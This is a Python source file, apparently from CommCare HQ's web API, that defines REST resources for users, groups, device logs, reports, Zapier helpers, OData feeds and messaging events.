from corehq.apps.api.resources.auth import (
AdminAuthentication,
ODataAuthentication,
RequirePermissionAuthentication,
LoginAuthentication)
from corehq.apps.api.resources.meta import CustomResourceMeta
from corehq.apps.api.util import get_obj
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.forms import clean_password
from corehq.apps.domain.models import Domain
from corehq.apps.es import UserES
from corehq.apps.export.esaccessors import (
get_case_export_base_query,
get_form_export_base_query,
)
from corehq.apps.export.models import CaseExportInstance, FormExportInstance
from corehq.apps.export.transforms import case_or_user_id_to_name
from corehq.apps.groups.models import Group
from corehq.apps.locations.permissions import location_safe
from corehq.apps.reports.analytics.esaccessors import (
get_case_types_for_domain_es,
)
from corehq.apps.reports.standard.cases.utils import (
query_location_restricted_cases,
query_location_restricted_forms,
)
from corehq.apps.reports.standard.message_event_display import get_event_display_api, get_sms_status_display_raw
from corehq.apps.sms.util import strip_plus, get_backend_name
from corehq.apps.userreports.columns import UCRExpandDatabaseSubcolumn
from corehq.apps.userreports.models import (
ReportConfiguration,
StaticReportConfiguration,
report_config_id_is_static,
)
from corehq.apps.userreports.reports.data_source import (
ConfigurableReportDataSource,
)
from corehq.apps.userreports.reports.view import (
get_filter_values,
query_dict_to_dict,
)
from corehq.apps.users.dbaccessors import (
get_all_user_id_username_pairs_by_domain,
)
from corehq.apps.users.models import (
CommCareUser,
CouchUser,
Permissions,
SQLUserRole,
WebUser,
)
from corehq.apps.users.util import raw_username
from corehq.const import USER_CHANGE_VIA_API
from corehq.util import get_document_or_404
from corehq.util.couch import DocumentNotFound, get_document_or_not_found
from corehq.util.model_log import ModelAction, log_model_change
from corehq.util.timer import TimingContext
from . import (
CouchResourceMixin,
DomainSpecificResourceMixin,
HqBaseResource,
v0_1,
v0_4,
CorsResourceMixin)
from .pagination import DoesNothingPaginator, NoCountingPaginator
MOCK_BULK_USER_ES = None
def user_es_call(domain, q, fields, size, start_at):
query = (UserES()
.domain(domain)
.fields(fields)
.size(size)
.start(start_at))
if q is not None:
query.set_query({"query_string": {"query": q}})
return query.run().hits
def _set_role_for_bundle(kwargs, bundle):
# check for roles associated with the domain
domain_roles = SQLUserRole.objects.by_domain_and_name(kwargs['domain'], bundle.data.get('role'))
if domain_roles:
qualified_role_id = domain_roles[0].get_qualified_id() # roles may not be unique by name
bundle.obj.set_role(kwargs['domain'], qualified_role_id)
else:
raise BadRequest(f"Invalid User Role '{bundle.data.get('role')}'")
class BulkUserResource(HqBaseResource, DomainSpecificResourceMixin):
"""
A read-only user data resource based on elasticsearch.
Supported Params: limit offset q fields
"""
type = "bulk-user"
id = fields.CharField(attribute='id', readonly=True, unique=True)
email = fields.CharField(attribute='email')
username = fields.CharField(attribute='username', unique=True)
first_name = fields.CharField(attribute='first_name', null=True)
last_name = fields.CharField(attribute='last_name', null=True)
phone_numbers = fields.ListField(attribute='phone_numbers', null=True)
@staticmethod
def to_obj(user):
'''
Takes a flat dict and returns an object
'''
if '_id' in user:
user['id'] = user.pop('_id')
return namedtuple('user', list(user))(**user)
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.edit_commcare_users)
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
object_class = object
resource_name = 'bulk-user'
def dehydrate(self, bundle):
fields = bundle.request.GET.getlist('fields')
data = {}
if not fields:
return bundle
for field in fields:
data[field] = bundle.data[field]
bundle.data = data
return bundle
def obj_get_list(self, bundle, **kwargs):
request_fields = bundle.request.GET.getlist('fields')
for field in request_fields:
if field not in self.fields:
raise BadRequest('{0} is not a valid field'.format(field))
params = bundle.request.GET
param = lambda p: params.get(p, None)
fields = list(self.fields)
fields.remove('id')
fields.append('_id')
fn = MOCK_BULK_USER_ES or user_es_call
users = fn(
domain=kwargs['domain'],
q=param('q'),
fields=fields,
size=param('limit'),
start_at=param('offset'),
)
return list(map(self.to_obj, users))
def detail_uri_kwargs(self, bundle_or_obj):
return {
'pk': get_obj(bundle_or_obj).id
}
class CommCareUserResource(v0_1.CommCareUserResource):
class Meta(v0_1.CommCareUserResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict) and request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if bundle_or_obj is None:
return super(CommCareUserResource, self).get_resource_uri(bundle_or_obj, url_name)
elif isinstance(bundle_or_obj, Bundle):
obj = bundle_or_obj.obj
else:
obj = bundle_or_obj
return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
domain=obj.domain,
api_name=self._meta.api_name,
pk=obj._id))
def _update(self, bundle):
should_save = False
for key, value in bundle.data.items():
if getattr(bundle.obj, key, None) != value:
if key == 'phone_numbers':
bundle.obj.phone_numbers = []
for idx, phone_number in enumerate(bundle.data.get('phone_numbers', [])):
bundle.obj.add_phone_number(strip_plus(phone_number))
if idx == 0:
bundle.obj.set_default_phone_number(strip_plus(phone_number))
should_save = True
elif key == 'groups':
bundle.obj.set_groups(bundle.data.get("groups", []))
should_save = True
elif key in ['email', 'username']:
setattr(bundle.obj, key, value.lower())
should_save = True
elif key == 'password':
domain = Domain.get_by_name(bundle.obj.domain)
if domain.strong_mobile_passwords:
try:
clean_password(bundle.data.get("password"))
except ValidationError as e:
if not hasattr(bundle.obj, 'errors'):
bundle.obj.errors = []
bundle.obj.errors.append(str(e))
return False
bundle.obj.set_password(bundle.data.get("password"))
should_save = True
elif key == 'user_data':
try:
bundle.obj.update_metadata(value)
except ValueError as e:
raise BadRequest(str(e))
else:
setattr(bundle.obj, key, value)
should_save = True
return should_save
def obj_create(self, bundle, **kwargs):
try:
bundle.obj = CommCareUser.create(
domain=kwargs['domain'],
username=bundle.data['username'].lower(),
password=bundle.data['password'],
created_by=bundle.request.user,
created_via=USER_CHANGE_VIA_API,
email=bundle.data.get('email', '').lower(),
)
del bundle.data['password']
self._update(bundle)
bundle.obj.save()
except Exception:
if bundle.obj._id:
bundle.obj.retire(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
try:
django_user = bundle.obj.get_django_user()
except User.DoesNotExist:
pass
else:
django_user.delete()
log_model_change(bundle.request.user, django_user, message=f"deleted_via: {USER_CHANGE_VIA_API}",
action=ModelAction.DELETE)
raise
return bundle
def obj_update(self, bundle, **kwargs):
bundle.obj = CommCareUser.get(kwargs['pk'])
assert bundle.obj.domain == kwargs['domain']
if self._update(bundle):
assert bundle.obj.domain == kwargs['domain']
bundle.obj.save()
return bundle
else:
raise BadRequest(''.join(chain.from_iterable(bundle.obj.errors)))
def obj_delete(self, bundle, **kwargs):
user = CommCareUser.get(kwargs['pk'])
if user:
user.retire(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
return ImmediateHttpResponse(response=http.HttpAccepted())
class WebUserResource(v0_1.WebUserResource):
class Meta(v0_1.WebUserResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict) and request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if isinstance(bundle_or_obj, Bundle):
domain = bundle_or_obj.request.domain
obj = bundle_or_obj.obj
elif bundle_or_obj is None:
return None
return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
domain=domain,
api_name=self._meta.api_name,
pk=obj._id))
def _validate(self, bundle):
if bundle.data.get('is_admin', False):
# default value Admin since that will be assigned later anyway since is_admin is True
if bundle.data.get('role', 'Admin') != 'Admin':
raise BadRequest("An admin can have only one role : Admin")
else:
if not bundle.data.get('role', None):
raise BadRequest("Please assign role for non admin user")
def _update(self, bundle):
should_save = False
for key, value in bundle.data.items():
if key == "role":
# role handled in _set_role_for_bundle
continue
if getattr(bundle.obj, key, None) != value:
if key == 'phone_numbers':
bundle.obj.phone_numbers = []
for idx, phone_number in enumerate(bundle.data.get('phone_numbers', [])):
bundle.obj.add_phone_number(strip_plus(phone_number))
if idx == 0:
bundle.obj.set_default_phone_number(strip_plus(phone_number))
should_save = True
elif key in ['email', 'username']:
setattr(bundle.obj, key, value.lower())
should_save = True
else:
setattr(bundle.obj, key, value)
should_save = True
return should_save
def obj_create(self, bundle, **kwargs):
self._validate(bundle)
try:
self._meta.domain = kwargs['domain']
bundle.obj = WebUser.create(
domain=kwargs['domain'],
username=bundle.data['username'].lower(),
password=bundle.data['password'],
created_by=bundle.request.user,
created_via=USER_CHANGE_VIA_API,
email=bundle.data.get('email', '').lower(),
is_admin=bundle.data.get('is_admin', False)
)
del bundle.data['password']
self._update(bundle)
# is_admin takes priority over role
if not bundle.obj.is_admin and bundle.data.get('role'):
_set_role_for_bundle(kwargs, bundle)
bundle.obj.save()
except Exception:
if bundle.obj._id:
bundle.obj.delete(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
else:
try:
django_user = bundle.obj.get_django_user()
except User.DoesNotExist:
pass
else:
django_user.delete()
log_model_change(bundle.request.user, django_user, message=f"deleted_via: {USER_CHANGE_VIA_API}",
action=ModelAction.DELETE)
raise
return bundle
def obj_update(self, bundle, **kwargs):
self._validate(bundle)
bundle.obj = WebUser.get(kwargs['pk'])
assert kwargs['domain'] in bundle.obj.domains
if self._update(bundle):
assert kwargs['domain'] in bundle.obj.domains
bundle.obj.save()
return bundle
class AdminWebUserResource(v0_1.UserResource):
domains = fields.ListField(attribute='domains')
def obj_get(self, bundle, **kwargs):
return WebUser.get(kwargs['pk'])
def obj_get_list(self, bundle, **kwargs):
if 'username' in bundle.request.GET:
return [WebUser.get_by_username(bundle.request.GET['username'])]
return [WebUser.wrap(u) for u in UserES().web_users().run().hits]
class Meta(WebUserResource.Meta):
authentication = AdminAuthentication()
detail_allowed_methods = ['get']
list_allowed_methods = ['get']
class GroupResource(v0_4.GroupResource):
class Meta(v0_4.GroupResource.Meta):
detail_allowed_methods = ['get', 'put', 'delete']
list_allowed_methods = ['get', 'post', 'patch']
always_return_data = True
def serialize(self, request, data, format, options=None):
if not isinstance(data, dict):
if 'error_message' in data.data:
data = {'error_message': data.data['error_message']}
elif request.method == 'POST':
data = {'id': data.obj._id}
return self._meta.serializer.serialize(data, format, options)
def patch_list(self, request=None, **kwargs):
"""
Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1466
(BSD licensed) and modified to pass the kwargs to `obj_create` and support only create method
"""
request = convert_post_to_patch(request)
deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
collection_name = self._meta.collection_name
if collection_name not in deserialized:
raise BadRequest("Invalid data sent: missing '%s'" % collection_name)
if len(deserialized[collection_name]) and 'put' not in self._meta.detail_allowed_methods:
raise ImmediateHttpResponse(response=http.HttpMethodNotAllowed())
bundles_seen = []
status = http.HttpAccepted
for data in deserialized[collection_name]:
data = self.alter_deserialized_detail_data(request, data)
bundle = self.build_bundle(data=dict_strip_unicode_keys(data), request=request)
try:
self.obj_create(bundle=bundle, **self.remove_api_resource_names(kwargs))
except AssertionError as e:
status = http.HttpBadRequest
bundle.data['_id'] = str(e)
bundles_seen.append(bundle)
to_be_serialized = [bundle.data['_id'] for bundle in bundles_seen]
return self.create_response(request, to_be_serialized, response_class=status)
def post_list(self, request, **kwargs):
"""
Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1314
(BSD licensed) and modified to catch Exception and not returning traceback
"""
deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
deserialized = self.alter_deserialized_detail_data(request, deserialized)
bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized), request=request)
try:
updated_bundle = self.obj_create(bundle, **self.remove_api_resource_names(kwargs))
location = self.get_resource_uri(updated_bundle)
if not self._meta.always_return_data:
return http.HttpCreated(location=location)
else:
updated_bundle = self.full_dehydrate(updated_bundle)
updated_bundle = self.alter_detail_data_to_serialize(request, updated_bundle)
return self.create_response(request, updated_bundle, response_class=http.HttpCreated, location=location)
except AssertionError as e:
bundle.data['error_message'] = str(e)
return self.create_response(request, bundle, response_class=http.HttpBadRequest)
def _update(self, bundle):
should_save = False
for key, value in bundle.data.items():
if key == 'name' and getattr(bundle.obj, key, None) != value:
if not Group.by_name(bundle.obj.domain, value):
setattr(bundle.obj, key, value or '')
should_save = True
else:
raise Exception("A group with this name already exists")
if key == 'users' and getattr(bundle.obj, key, None) != value:
users_to_add = set(value) - set(bundle.obj.users)
users_to_remove = set(bundle.obj.users) - set(value)
for user in users_to_add:
bundle.obj.add_user(user)
should_save = True
for user in users_to_remove:
bundle.obj.remove_user(user)
should_save = True
elif getattr(bundle.obj, key, None) != value:
setattr(bundle.obj, key, value)
should_save = True
return should_save
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
if bundle_or_obj is None:
return super(GroupResource, self).get_resource_uri(bundle_or_obj, url_name)
elif isinstance(bundle_or_obj, Bundle):
obj = bundle_or_obj.obj
else:
obj = bundle_or_obj
return self._get_resource_uri(obj)
def _get_resource_uri(self, obj):
# This function is called up to 1000 times per request
# so build url from a known string template
# to avoid calling the expensive `reverse` function each time
return self._get_resource_uri_template.format(domain=obj.domain, pk=obj._id)
@memoized_property
def _get_resource_uri_template(self):
"""Returns the literal string "/a/{domain}/api/v0.5/group/{pk}/" in a DRY way"""
return reverse('api_dispatch_detail', kwargs=dict(
resource_name=self._meta.resource_name,
api_name=self._meta.api_name,
domain='__domain__',
pk='__pk__')).replace('__pk__', '{pk}').replace('__domain__', '{domain}')
def obj_create(self, bundle, request=None, **kwargs):
if not Group.by_name(kwargs['domain'], bundle.data.get("name")):
bundle.obj = Group(bundle.data)
bundle.obj.name = bundle.obj.name or ''
bundle.obj.domain = kwargs['domain']
bundle.obj.save()
for user in bundle.obj.users:
CommCareUser.get(user).set_groups([bundle.obj._id])
else:
raise AssertionError("A group with name %s already exists" % bundle.data.get("name"))
return bundle
def obj_update(self, bundle, **kwargs):
bundle.obj = Group.get(kwargs['pk'])
assert bundle.obj.domain == kwargs['domain']
if self._update(bundle):
assert bundle.obj.domain == kwargs['domain']
bundle.obj.save()
return bundle
def obj_delete(self, bundle, **kwargs):
group = self.obj_get(bundle, **kwargs)
group.soft_delete()
return bundle
class DomainAuthorization(ReadOnlyAuthorization):
def __init__(self, domain_key='domain', *args, **kwargs):
self.domain_key = domain_key
def read_list(self, object_list, bundle):
return object_list.filter(**{self.domain_key: bundle.request.domain})
class DeviceReportResource(HqBaseResource, ModelResource):
class Meta(object):
queryset = DeviceReportEntry.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'device-log'
authentication = RequirePermissionAuthentication(Permissions.edit_data)
authorization = DomainAuthorization()
paginator_class = NoCountingPaginator
filtering = {
# this is needed for the domain filtering but any values passed in via the URL get overridden
"domain": ('exact',),
"date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
"user_id": ('exact',),
"username": ('exact',),
"type": ('exact',),
"xform_id": ('exact',),
"device_id": ('exact',),
}
class StockTransactionResource(HqBaseResource, ModelResource):
class Meta(object):
queryset = StockTransaction.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'stock_transaction'
authentication = RequirePermissionAuthentication(Permissions.view_reports)
paginator_class = NoCountingPaginator
authorization = DomainAuthorization(domain_key='report__domain')
filtering = {
"case_id": ('exact',),
"section_id": ('exact'),
}
fields = ['case_id', 'product_id', 'type', 'section_id', 'quantity', 'stock_on_hand']
include_resource_uri = False
def build_filters(self, filters=None):
orm_filters = super(StockTransactionResource, self).build_filters(filters)
if 'start_date' in filters:
orm_filters['report__date__gte'] = filters['start_date']
if 'end_date' in filters:
orm_filters['report__date__lte'] = filters['end_date']
return orm_filters
def dehydrate(self, bundle):
bundle.data['product_name'] = bundle.obj.sql_product.name
bundle.data['transaction_date'] = bundle.obj.report.date
return bundle
ConfigurableReportData = namedtuple("ConfigurableReportData", [
"data", "columns", "id", "domain", "total_records", "get_params", "next_page"
])
class ConfigurableReportDataResource(HqBaseResource, DomainSpecificResourceMixin):
"""
A resource that replicates the behavior of the ajax part of the
ConfigurableReportView view.
"""
data = fields.ListField(attribute="data", readonly=True)
columns = fields.ListField(attribute="columns", readonly=True)
total_records = fields.IntegerField(attribute="total_records", readonly=True)
next_page = fields.CharField(attribute="next_page", readonly=True)
LIMIT_DEFAULT = 50
LIMIT_MAX = 50
def _get_start_param(self, bundle):
try:
start = int(bundle.request.GET.get('offset', 0))
if start < 0:
raise ValueError
except (ValueError, TypeError):
raise BadRequest("start must be a positive integer.")
return start
def _get_limit_param(self, bundle):
try:
limit = int(bundle.request.GET.get('limit', self.LIMIT_DEFAULT))
if limit < 0:
raise ValueError
except (ValueError, TypeError):
raise BadRequest("limit must be a positive integer.")
if limit > self.LIMIT_MAX:
raise BadRequest("Limit may not exceed {}.".format(self.LIMIT_MAX))
return limit
def _get_next_page(self, domain, id_, start, limit, total_records, get_query_dict):
if total_records > start + limit:
start += limit
new_get_params = get_query_dict.copy()
new_get_params["offset"] = start
# limit has not changed, but it may not have been present in get params before.
new_get_params["limit"] = limit
return reverse('api_dispatch_detail', kwargs=dict(
api_name=self._meta.api_name,
resource_name=self._meta.resource_name,
domain=domain,
pk=id_,
)) + "?" + new_get_params.urlencode()
else:
return ""
def _get_report_data(self, report_config, domain, start, limit, get_params):
report = ConfigurableReportDataSource.from_spec(report_config, include_prefilters=True)
string_type_params = [
filter.name
for filter in report_config.ui_filters
if getattr(filter, 'datatype', 'string') == "string"
]
filter_values = get_filter_values(
report_config.ui_filters,
query_dict_to_dict(get_params, domain, string_type_params)
)
report.set_filter_values(filter_values)
page = list(report.get_data(start=start, limit=limit))
columns = []
for column in report.columns:
simple_column = {
"header": column.header,
"slug": column.slug,
}
if isinstance(column, UCRExpandDatabaseSubcolumn):
simple_column['expand_column_value'] = column.expand_value
columns.append(simple_column)
total_records = report.get_total_records()
return page, columns, total_records
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
pk = kwargs['pk']
start = self._get_start_param(bundle)
limit = self._get_limit_param(bundle)
report_config = self._get_report_configuration(pk, domain)
page, columns, total_records = self._get_report_data(
report_config, domain, start, limit, bundle.request.GET)
return ConfigurableReportData(
data=page,
columns=columns,
total_records=total_records,
id=report_config._id,
domain=domain,
get_params=bundle.request.GET,
next_page=self._get_next_page(
domain,
report_config._id,
start,
limit,
total_records,
bundle.request.GET,
)
)
def _get_report_configuration(self, id_, domain):
"""
Fetch the required ReportConfiguration object
:param id_: The id of the ReportConfiguration
:param domain: The domain of the ReportConfiguration
:return: A ReportConfiguration
"""
try:
if report_config_id_is_static(id_):
return StaticReportConfiguration.by_id(id_, domain=domain)
else:
return get_document_or_not_found(ReportConfiguration, domain, id_)
except DocumentNotFound:
raise NotFound
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj).id,
}
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
uri = super(ConfigurableReportDataResource, self).get_resource_uri(bundle_or_obj, url_name)
if bundle_or_obj is not None and uri:
get_params = get_obj(bundle_or_obj).get_params.copy()
if "offset" not in get_params:
get_params["offset"] = 0
if "limit" not in get_params:
get_params["limit"] = self.LIMIT_DEFAULT
uri += "?{}".format(get_params.urlencode())
return uri
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.view_reports, allow_session_auth=True)
list_allowed_methods = []
detail_allowed_methods = ["get"]
class SimpleReportConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
id = fields.CharField(attribute='get_id', readonly=True, unique=True)
title = fields.CharField(readonly=True, attribute="title", null=True)
filters = fields.ListField(readonly=True)
columns = fields.ListField(readonly=True)
def dehydrate_filters(self, bundle):
obj_filters = bundle.obj.filters
return [{
"type": f["type"],
"datatype": f["datatype"],
"slug": f["slug"]
} for f in obj_filters]
def dehydrate_columns(self, bundle):
obj_columns = bundle.obj.columns
return [{
"column_id": c['column_id'],
"display": c['display'],
"type": c["type"],
} for c in obj_columns]
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
pk = kwargs['pk']
try:
report_configuration = get_document_or_404(ReportConfiguration, domain, pk)
except Http404 as e:
raise NotFound(str(e))
return report_configuration
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
return ReportConfiguration.by_domain(domain)
def detail_uri_kwargs(self, bundle_or_obj):
return {
'domain': get_obj(bundle_or_obj).domain,
'pk': get_obj(bundle_or_obj)._id,
}
class Meta(CustomResourceMeta):
list_allowed_methods = ["get"]
detail_allowed_methods = ["get"]
paginator_class = DoesNothingPaginator
UserDomain = namedtuple('UserDomain', 'domain_name project_name')
UserDomain.__new__.__defaults__ = ('', '')
class UserDomainsResource(CorsResourceMixin, Resource):
domain_name = fields.CharField(attribute='domain_name')
project_name = fields.CharField(attribute='project_name')
class Meta(object):
resource_name = 'user_domains'
authentication = LoginAuthentication(allow_session_auth=True)
object_class = UserDomain
include_resource_uri = False
def dispatch_list(self, request, **kwargs):
try:
return super(UserDomainsResource, self).dispatch_list(request, **kwargs)
except ImmediateHttpResponse as immediate_http_response:
if isinstance(immediate_http_response.response, HttpUnauthorized):
raise ImmediateHttpResponse(
response=HttpUnauthorized(
content='Username or API Key is incorrect', content_type='text/plain'
)
)
else:
raise
def obj_get_list(self, bundle, **kwargs):
return self.get_object_list(bundle.request)
def get_object_list(self, request):
couch_user = CouchUser.from_django_user(request.user)
results = []
for domain in couch_user.get_domains():
if not domain_has_privilege(domain, privileges.ZAPIER_INTEGRATION):
continue
domain_object = Domain.get_by_name(domain)
results.append(UserDomain(
domain_name=domain_object.name,
project_name=domain_object.hr_name or domain_object.name
))
return results
class IdentityResource(CorsResourceMixin, Resource):
id = fields.CharField(attribute='get_id', readonly=True)
username = fields.CharField(attribute='username', readonly=True)
first_name = fields.CharField(attribute='first_name', readonly=True)
last_name = fields.CharField(attribute='last_name', readonly=True)
email = fields.CharField(attribute='email', readonly=True)
def obj_get_list(self, bundle, **kwargs):
return [bundle.request.couch_user]
class Meta(object):
resource_name = 'identity'
authentication = LoginAuthentication()
serializer = ListToSingleObjectSerializer()
detail_allowed_methods = []
list_allowed_methods = ['get']
object_class = CouchUser
include_resource_uri = False
Form = namedtuple('Form', 'form_xmlns form_name')
Form.__new__.__defaults__ = ('', '')
class DomainForms(Resource):
"""
Returns: list of forms for a given domain with form name formatted for display in Zapier
"""
form_xmlns = fields.CharField(attribute='form_xmlns')
form_name = fields.CharField(attribute='form_name')
class Meta(object):
resource_name = 'domain_forms'
authentication = RequirePermissionAuthentication(Permissions.access_api)
object_class = Form
include_resource_uri = False
allowed_methods = ['get']
limit = 200
max_limit = 1000
def obj_get_list(self, bundle, **kwargs):
application_id = bundle.request.GET.get('application_id')
if not application_id:
raise NotFound('application_id parameter required')
results = []
application = Application.get(docid=application_id)
if not application:
return []
forms_objects = application.get_forms(bare=False)
for form_object in forms_objects:
form = form_object['form']
module = form_object['module']
form_name = '{} > {} > {}'.format(application.name, module.default_name(), form.default_name())
results.append(Form(form_xmlns=form.xmlns, form_name=form_name))
return results
# Zapier requires id and name; case_type has no obvious id, placeholder inserted instead.
CaseType = namedtuple('CaseType', 'case_type placeholder')
CaseType.__new__.__defaults__ = ('', '')
class DomainCases(Resource):
"""
Returns: list of case types for a domain
Note: only returns case types for which at least one case has been made
"""
placeholder = fields.CharField(attribute='placeholder')
case_type = fields.CharField(attribute='case_type')
class Meta(object):
resource_name = 'domain_cases'
authentication = RequirePermissionAuthentication(Permissions.access_api)
object_class = CaseType
include_resource_uri = False
allowed_methods = ['get']
limit = 100
max_limit = 1000
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
case_types = get_case_types_for_domain_es(domain)
results = [CaseType(case_type=case_type) for case_type in case_types]
return results
UserInfo = namedtuple('UserInfo', 'user_id user_name')
UserInfo.__new__.__defaults__ = ('', '')
class DomainUsernames(Resource):
"""
Returns: list of usernames for a domain.
"""
user_id = fields.CharField(attribute='user_id')
user_name = fields.CharField(attribute='user_name')
class Meta(object):
resource_name = 'domain_usernames'
authentication = RequirePermissionAuthentication(Permissions.view_commcare_users)
object_class = User
include_resource_uri = False
allowed_methods = ['get']
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
user_ids_username_pairs = get_all_user_id_username_pairs_by_domain(domain)
results = [UserInfo(user_id=user_pair[0], user_name=raw_username(user_pair[1]))
for user_pair in user_ids_username_pairs]
return results
class BaseODataResource(HqBaseResource, DomainSpecificResourceMixin):
config_id = None
table_id = None
def dispatch(self, request_type, request, **kwargs):
if not domain_has_privilege(request.domain, privileges.ODATA_FEED):
raise ImmediateHttpResponse(
response=HttpResponseNotFound('Feature flag not enabled.')
)
self.config_id = kwargs['config_id']
self.table_id = int(kwargs.get('table_id', 0))
with TimingContext() as timer:
response = super(BaseODataResource, self).dispatch(
request_type, request, **kwargs
)
record_feed_access_in_datadog(request, self.config_id, timer.duration, response)
return response
def create_response(self, request, data, response_class=HttpResponse,
**response_kwargs):
data['domain'] = request.domain
data['config_id'] = self.config_id
data['api_path'] = request.path
data['table_id'] = self.table_id
response = super(BaseODataResource, self).create_response(
request, data, response_class, **response_kwargs)
return add_odata_headers(response)
def detail_uri_kwargs(self, bundle_or_obj):
# Not sure why this is required but the feed 500s without it
return {
'pk': get_obj(bundle_or_obj)['_id']
}
def determine_format(self, request):
# Results should be sent as JSON
return 'application/json'
@location_safe
class ODataCaseResource(BaseODataResource):
def obj_get_list(self, bundle, domain, **kwargs):
config = get_document_or_404(CaseExportInstance, domain, self.config_id)
if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
raise ImmediateHttpResponse(
HttpForbidden(ugettext_noop(
"You do not have permission to view this feed."
))
)
query = get_case_export_base_query(domain, config.case_type)
for filter in config.get_filters():
query = query.filter(filter.to_es_filter())
if not bundle.request.couch_user.has_permission(
domain, 'access_all_locations'
):
query = query_location_restricted_cases(query, bundle.request)
return query
class Meta(v0_4.CommCareCaseResource.Meta):
authentication = ODataAuthentication()
resource_name = 'odata/cases'
serializer = ODataCaseSerializer()
limit = 2000
max_limit = 10000
def prepend_urls(self):
return [
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
]
@location_safe
class ODataFormResource(BaseODataResource):
def obj_get_list(self, bundle, domain, **kwargs):
config = get_document_or_404(FormExportInstance, domain, self.config_id)
if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
raise ImmediateHttpResponse(
HttpForbidden(ugettext_noop(
"You do not have permission to view this feed."
))
)
query = get_form_export_base_query(domain, config.app_id, config.xmlns, include_errors=False)
for filter in config.get_filters():
query = query.filter(filter.to_es_filter())
if not bundle.request.couch_user.has_permission(
domain, 'access_all_locations'
):
query = query_location_restricted_forms(query, bundle.request)
return query
class Meta(v0_4.XFormInstanceResource.Meta):
authentication = ODataAuthentication()
resource_name = 'odata/forms'
serializer = ODataFormSerializer()
limit = 2000
max_limit = 10000
def prepend_urls(self):
return [
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
]
class MessagingEventResourceNew(HqBaseResource, ModelResource):
source = fields.DictField()
recipient = fields.DictField()
form = fields.DictField()
error = fields.DictField()
messages = fields.ListField()
def dehydrate(self, bundle):
bundle.data["domain"] = bundle.obj.parent.domain
return bundle
def dehydrate_status(self, bundle):
event = bundle.obj
if event.status == MessagingEvent.STATUS_COMPLETED and event.xforms_session_id:
return event.xforms_session.status_api
return MessagingEvent.STATUS_SLUGS.get(event.status, 'unknown')
def dehydrate_content_type(self, bundle):
return MessagingEvent.CONTENT_TYPE_SLUGS.get(bundle.obj.content_type, "unknown")
def dehydrate_source(self, bundle):
parent = bundle.obj.parent
return {
"id": parent.source_id,
"type": MessagingEvent.SOURCE_SLUGS.get(parent.source, 'unknown'),
"display": get_event_display_api(parent),
}
def dehydrate_recipient(self, bundle):
display_value = None
if bundle.obj.recipient_id:
display_value = case_or_user_id_to_name(bundle.obj.recipient_id, {
"couch_recipient_doc_type": bundle.obj.get_recipient_doc_type()
})
return {
"id": bundle.obj.recipient_id,
"type": MessagingSubEvent.RECIPIENT_SLUGS.get(bundle.obj.recipient_type, "unknown"),
"display": display_value or "unknown",
}
def dehydrate_form(self, bundle):
event = bundle.obj
if event.content_type not in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):
return None
submission_id = None
if event.xforms_session_id:
submission_id = event.xforms_session.submission_id
return {
"app_id": bundle.obj.app_id,
"form_unique_id": bundle.obj.form_unique_id,
"form_name": bundle.obj.form_name,
"form_submission_id": submission_id,
}
def dehydrate_error(self, bundle):
event = bundle.obj
if not event.error_code:
return None
return {
"code": event.error_code,
"message": MessagingEvent.ERROR_MESSAGES.get(event.error_code, None),
"message_detail": event.additional_error_text
}
def dehydrate_messages(self, bundle):
event = bundle.obj
if event.content_type == MessagingEvent.CONTENT_EMAIL:
return self._get_messages_for_email(event)
